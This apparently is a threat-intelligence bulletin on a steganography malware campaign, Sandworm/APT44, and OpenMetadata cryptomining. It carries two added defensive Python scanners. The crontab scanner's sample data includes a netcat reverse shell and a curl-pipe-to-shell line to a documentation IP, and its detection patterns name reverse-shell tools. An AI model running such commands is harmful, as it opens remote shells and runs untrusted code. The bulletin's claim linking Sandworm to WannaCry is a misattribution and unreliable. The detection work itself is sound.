Ankura CTIX FLASH Update - April 19, 2024

Ransomware/Malware Activity

SteganoAmor Malware Campaign Hides Malicious Payloads via Steganography

Researchers at Positive Technologies have identified over 320 attacks in a malware campaign, primarily targeting organizations in Latin America, that leverages steganography to obfuscate malicious payloads. The hacking group TA558 is believed to be behind the operation. The SteganoAmor attack begins with a phishing email sent from compromised SMTP servers, abusing the positive reputation of existing domains. The phishing email carries a Microsoft Office document (Excel or Word) crafted to exploit a known Microsoft Equation Editor vulnerability tracked as CVE-2017-11882. This flaw is nearly seven (7) years old, and the exploit checks the version of Microsoft Office installed to determine whether it will advance to the next stage of the campaign, which downloads a Visual Basic Script (VBS). The script retrieves an image file that uses steganography to hide PowerShell code; that code downloads the final payload from a legitimate cloud service to evade detection by anti-virus tools. Researchers have seen multiple forms of malware delivered via the final payload, including AgentTesla, Remcos, LokiBot, XWorm, and more. All are either remote access tools or infostealers, designed to send stolen information back to the attacker via compromised FTP servers. The use of steganography in this attack provides an evasion technique not commonly seen in modern campaigns. However, the Equation Editor flaw required to carry out the attack is quite old, meaning organizations running later versions of Microsoft Office are safe from the SteganoAmor campaign. CTIX analysts will continue to report on novel and evolving malware versions and associated campaigns.
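The report does not say how the campaign's images carry the PowerShell stage, so the following is an added defensive example, not code from the CTIX report or from Positive Technologies. It checks one simple and common hiding technique: data appended after a PNG IEND chunk or a JPEG end-of-image marker, which leaves the image rendering normally while the trailer holds script text. The indicator list and the sample images are constructed for the example; pixel-level steganography would need statistical analysis and is not covered.

```python
"""Flag image files that carry extra data past the format's end-of-image marker.

Added example (not from the CTIX report). Detects appended trailers only;
the indicator strings below are an assumed, minimal list for illustration.
"""
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"

# (name, pattern) pairs that should not appear in genuine image bytes (assumed list).
SUSPICIOUS = [
    ("powershell", re.compile(rb"powershell", re.IGNORECASE)),
    ("invoke-expression", re.compile(rb"Invoke-Expression|\bIEX\b", re.IGNORECASE)),
    ("base64-decode", re.compile(rb"FromBase64String", re.IGNORECASE)),
    ("url", re.compile(rb"https?://", re.IGNORECASE)),
]


def png_end_offset(data: bytes):
    """Return the offset just past the IEND chunk, or None if not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 12 + length  # 4 length + 4 type + data + 4 CRC
        if chunk_end > len(data):
            return None
        if ctype == b"IEND":
            return chunk_end
        pos = chunk_end
    return None


def jpeg_end_offset(data: bytes):
    """Walk JPEG segments and return the offset just past the EOI marker, or None."""
    if not data.startswith(JPEG_SOI):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:  # standalone markers
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len
        if marker == 0xDA:                      # SOS: skip entropy-coded data
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] != 0x00
                and not 0xD0 <= data[pos + 1] <= 0xD7
            ):
                pos += 1
    return None


def scan_image(data: bytes) -> dict:
    """Report trailer size and which indicator strings appear in the trailer."""
    fmt, end = "png", png_end_offset(data)
    if end is None:
        fmt, end = "jpeg", jpeg_end_offset(data)
    if end is None:
        return {"format": "unknown", "trailer_bytes": 0, "indicators": []}
    trailer = data[end:]
    hits = sorted(name for name, rx in SUSPICIOUS if rx.search(trailer))
    return {"format": fmt, "trailer_bytes": len(trailer), "indicators": hits}


# --- constructed sample images (not real campaign artifacts) ---
def _png_chunk(ctype: bytes, payload: bytes = b"") -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


CLEAN_PNG = (PNG_SIG
             + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + _png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
             + _png_chunk(b"IEND"))
# Harmless constructed trailer containing a few indicator tokens.
TAMPERED_PNG = CLEAN_PNG + b"\r\npowershell -c \"FromBase64String('AAA=')\" http://example.invalid/next\r\n"
CLEAN_JPEG = JPEG_SOI + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + bytes(9) + b"\xff\xd9"

if __name__ == "__main__":
    for label, blob in [("clean png", CLEAN_PNG), ("tampered png", TAMPERED_PNG),
                        ("clean jpeg", CLEAN_JPEG)]:
        print(label, scan_image(blob))
```

A zero-byte trailer with no indicators is the normal case; a large trailer with none of the strings is still worth a second look, since the script stage may be encoded rather than stored as plain text.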

Threat Actor Activity

Russian-backed Sandworm Hackers Upgraded to APT44 in Response to Heightened Threat Posed

The Sandworm hacking group, a threat actor with strong ties to Russia's Main Intelligence Directorate (GRU) and previously known as BlackEnergy, Seashell Blizzard, or Voodoo Bear, is now being tracked as APT44 due to the group's highly adaptive nature and the significant risk it poses to governments and critical infrastructure organizations around the world. APT44 has been leveraging sophisticated cyber tactics to conduct espionage, sabotage, and influence operations on a global scale for a decade and a half. Active since at least 2009, the group has evolved its strategies over time, but its true strength has been particularly highlighted in the wake of Russia's invasion of Ukraine, showcasing its ability to support Russia's military campaign with cyber warfare capabilities. APT44 has adeptly used online personas and Telegram channels, such as XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek, to obfuscate its activities, posing as independent hacktivist groups while conducting operations that align with Russia's strategic interests. These platforms have been instrumental in leaking sensitive information, claiming responsibility for cyberattacks, and spreading narratives favorable to Russia, effectively blurring the lines between state-sponsored activity and grassroots hacktivism. The group's cyber operations have been wide-ranging and impactful, targeting not only Ukraine with data-wiping malware and other destructive attacks, but also NATO countries' electoral systems and critical infrastructure across the US and Europe. APT44 has been linked to significant cyber incidents in the past, such as the deployment of NotPetya malware, the WannaCry ransomware attack, and disruptions to water utility infrastructure, including a recent overflow event in Texas. Recent reports underscore the adaptability and sophistication of APT44, highlighting its role in shaping Russia's cyber offensive capabilities. The group's continued focus on Ukraine, coupled with its targeting of countries where Russian interests intersect, signifies a persistent and severe threat to global security.

Vulnerabilities

Attackers Exploit OpenMetadata Applications for Kubernetes Cryptomining Campaign

Threat actors have been observed exploiting multiple critical vulnerabilities in OpenMetadata, a popular open-source metadata management tool, to carry out a Kubernetes cryptomining campaign. The vulnerabilities, identified as CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254, include several critical remote code execution and authentication flaws, allowing attackers to hijack unpatched, internet-exposed OpenMetadata workloads. Since early April 2024, these vulnerabilities have enabled threat actors to execute code remotely, perform reconnaissance, and download cryptomining malware from a command-and-control (C2) server located in China. The attackers set up persistent access through cron jobs and Netcat reverse shells, and even leave notes pleading for Monero donations to buy a car or "suite" in China. This situation underscores the crucial importance of using strong authentication, keeping software up to date, and adhering to security best practices in containerized environments to prevent exploitation. CTIX analysts urge all OpenMetadata administrators to ensure their instances are up to date.
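The persistence described above (cron jobs plus Netcat reverse shells) leaves traces in crontab files that a responder can triage quickly. The following is an added example, not code from the CTIX report or from the researchers who documented the campaign: it parses crontab-format lines and flags commands matching a small, assumed list of reverse-shell and download-and-run indicators. The sample crontab is constructed, and 203.0.113.0/24 is documentation address space.

```python
"""Flag crontab entries that resemble reverse-shell or download-and-run persistence.

Added example (not from the CTIX report). The indicator regexes are an
assumed starting list, not a complete ruleset, and will need tuning.
"""
import re
from dataclasses import dataclass

# Either a @keyword schedule or five whitespace-separated time fields, then the command.
CRON_RE = re.compile(r"^\s*(@\w+|(?:\S+\s+){5})(.*)$")

INDICATORS = [
    # nc/ncat/netcat invoked with -e or -c (program execution on connect)
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b[^|;&]*\s-(?:\w*e|c)\b")),
    # bash's /dev/tcp pseudo-device, a common shell-only reverse connection
    ("bash-dev-tcp", re.compile(r"/dev/(?:tcp|udp)/")),
    # fetch a remote script and pipe it straight into a shell
    ("download-and-run", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")),
    # decode an inline base64 blob and pipe it into a shell
    ("base64-decode-run", re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")),
    # executables dropped in world-writable scratch directories
    ("tmp-exec", re.compile(r"(?:^|\s)(?:/tmp|/dev/shm|/var/tmp)/\S+")),
]


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    indicators: list


def parse_cron_line(line: str):
    """Return (schedule, command) for a job line, or None for comments/variables/blank."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
        return None
    m = CRON_RE.match(stripped)
    if not m:
        return None
    return m.group(1).strip(), m.group(2).strip()


def scan_crontab(text: str) -> list:
    """Scan crontab text and return a Finding per job line that hits any indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        hits = [name for name, rx in INDICATORS if rx.search(command)]
        if hits:
            findings.append(Finding(line_no, schedule, command, hits))
    return findings


# Constructed sample crontab: two benign jobs, four persistence-style entries.
SAMPLE_CRONTAB = """\
# constructed sample crontab for the example
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * nc -e /bin/sh 203.0.113.10 4444
@reboot /tmp/.x/update
30 1 * * * curl -s http://203.0.113.10/s.sh | sh
0 * * * * echo aGVsbG8= | base64 -d | bash
15 3 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{', '.join(f.indicators)}] {f.schedule} {f.command}")
```

Run it over `/etc/crontab`, `/etc/cron.d/*` and each user's spool file (on most distributions `/var/spool/cron/crontabs/*` or `/var/spool/cron/*`); in a container, the same check belongs in the image's filesystem and in any writable volumes. A hit is a lead for investigation, not a verdict, so pair it with the process and network evidence around the scheduled run time.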

The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the CTIX Team (ctix@ankura.com) if additional context is needed.

© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
